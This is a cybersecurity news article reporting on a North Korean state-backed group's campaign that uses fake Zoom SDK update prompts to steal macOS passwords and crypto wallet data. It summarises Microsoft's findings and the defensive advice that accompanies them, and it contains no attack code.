North Korean Sapphire Sleet Targets macOS Users With Fake Zoom Update Prompts to Steal Crypto Wallets
North Korean state-backed group Sapphire Sleet is running a social engineering campaign that uses fake software update prompts to trick macOS users into handing over passwords and cryptocurrency wallet data.
A dangerous new cyber campaign is putting macOS users at serious risk, and it does not rely on software bugs to do its damage. Instead, the attackers trick people into handing over their own passwords and sensitive data by making everything look completely normal. What appears to be a routine software update turns out to be a carefully crafted trap, and by the time a victim realizes something is wrong, the damage may already be done.
The group behind this activity is known as Sapphire Sleet, a North Korean state-backed threat actor active since at least March 2020. Their targets are not random. They focus almost entirely on people involved in cryptocurrency, venture capital, and blockchain-related businesses. The core goal is to steal digital assets and financial information from high-value individuals and organizations around the world.
Analysts at Microsoft said in a report shared with Cyber Security News that the campaign began in early 2026 and introduces macOS-specific attack techniques not previously seen from this actor. According to the report, the attack works entirely through social engineering, meaning the hackers convince users to run malicious files themselves rather than exploiting any flaw in the operating system.
The attack begins when a target is contacted on social media or professional platforms by someone posing as a job recruiter. After some back-and-forth, the target is directed to download a file disguised as a Zoom SDK update. Once opened, the file launches in macOS Script Editor, a legitimate Apple tool, and quietly begins pulling additional malicious code in the background. The user sees nothing suspicious, only what looks like an ordinary software installation.
Once the malicious script runs on a victim's machine, it silently deploys a fake application called systemupdate.app. This app presents the user with a native-looking macOS password dialog that is visually indistinguishable from a real system prompt. The user is told their password is required to finish the software update, and most people simply type it in without a second thought. After the password is entered, the malware verifies it against the local macOS authentication database. If the credential checks out, it is immediately forwarded to the attackers via the Telegram messaging service.
Beyond stealing credentials, Sapphire Sleet installs multiple backdoors to maintain long-term access. A component named com.apple.cli acts as a host monitoring tool that continuously checks in with the attackers' servers. A more advanced backdoor named icloudz loads code directly into memory, leaving little trace on disk and making it considerably harder for security tools to catch. The malware installs a launch daemon that automatically restarts the backdoor after every system reboot. All stolen data is compressed into archives and uploaded to attacker-controlled servers over port 8443, while credentials are sent separately via the Telegram Bot API.
Microsoft shared its findings with Apple as part of a responsible disclosure process. Apple has since rolled out platform-level protections, including XProtect signature updates and Safari Safe Browsing blocks, to detect and stop infrastructure tied to this campaign. macOS users are strongly encouraged to keep their devices fully updated to benefit from these protections. Microsoft advises users to never run scripts or terminal commands shared through chat messages without approval from a trusted IT team. Organizations should block compiled AppleScript files downloaded from the internet and monitor for unauthorized changes to the macOS TCC database. Anyone managing cryptocurrency assets should rely on hardware wallets and regularly rotate credentials stored in browsers.